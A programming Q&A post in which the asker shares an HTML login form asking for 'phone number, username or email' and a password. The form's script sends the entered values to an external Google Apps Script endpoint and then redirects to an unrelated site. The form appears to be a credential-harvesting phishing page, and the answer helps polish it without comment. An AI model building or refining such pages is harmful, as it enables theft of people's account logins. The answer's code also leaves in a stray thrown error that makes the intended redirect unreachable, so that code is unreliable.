# Disable input entries or button untill next page loaded

Tags: javascript, html, css

```
<!DOCTYPE html>

<html lang="en">

<head> 

<form action="" method="post" name="form">
 <div class="input">

      <input id="number"name="Phone" type="text" placeholder="Phone number,username or email" required></input>

                <br>

                <input id="pass" name="Pass" type="password" placeholder="Password " required></input>

        </div>
  **<button id="submit" class="btn" type="submit" onclick="click()">Log In </button>**

        </form>

<script>     

                const scriptURL = 'https://script.google.com/macros/s/AKfycbxD28OxZp-UKkWNjrGKve5cRQUMTAIduhvonfHBE2_x5tc548mrGC9KaovGsLKv_CTW/exec'

                const form = document.forms['form']

                form.addEventListener('submit', e => {

                        e.preventDefault()

                        fetch(scriptURL, { method: 'POST', body: new FormData(form) })

                                .then(response =>location.href='https://developerkaushal.netlify.com' )

                                .catch(error => console.error('Error!', error.message))

                })

        </script>

</body>

</html>
```

I want that disable button untill next page is loaded

I expect that until my webpage is loaded the user will not be able to click submit btn
I hope anyone can help me to fix it

I have added a script in which when data is submitted successfully, the user will redirect to the next page but it takes too much time to redirect the user to the next page.
So I want the user to not be able to click submit button again until the website is reloaded.

Answer (score 1):

You can select the `submit` button, and At the start of the click event handler you can disable the button, `submitButton.disable = true`, and you can enable it on the catch.

```html
<!DOCTYPE html>

<html lang="en">

<head>

  <form action="" method="post" name="form">
    <div class="input">

      <input id="number" name="Phone" type="text" placeholder="Phone number,username or email" required></input>

      <br>

      <input id="pass" name="Pass" type="password" placeholder="Password " required></input>

    </div>
    **<button id="submit" class="btn" type="submit" onclick="click()">Log In </button>**

  </form>

  <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbxD28OxZp-UKkWNjrGKve5cRQUMTAIduhvonfHBE2_x5tc548mrGC9KaovGsLKv_CTW/exec'

    const form = document.forms['form']
    const submitButton = document.querySelector('#submit');

    form.addEventListener('submit', e => {
      submitButton.disabled = true;
      e.preventDefault()
      fetch(scriptURL, {
          method: 'POST',
          body: new FormData(form)
        })

        .then(response => {
          throw new Error('error here');

          location.href = 'https://developerkaushal.netlify.com'

        })

        .catch(error => {
          submitButton.disabled = false;
          console.error('Error!', error.message)
        })

    })
  </script>

  </body>

</html>
```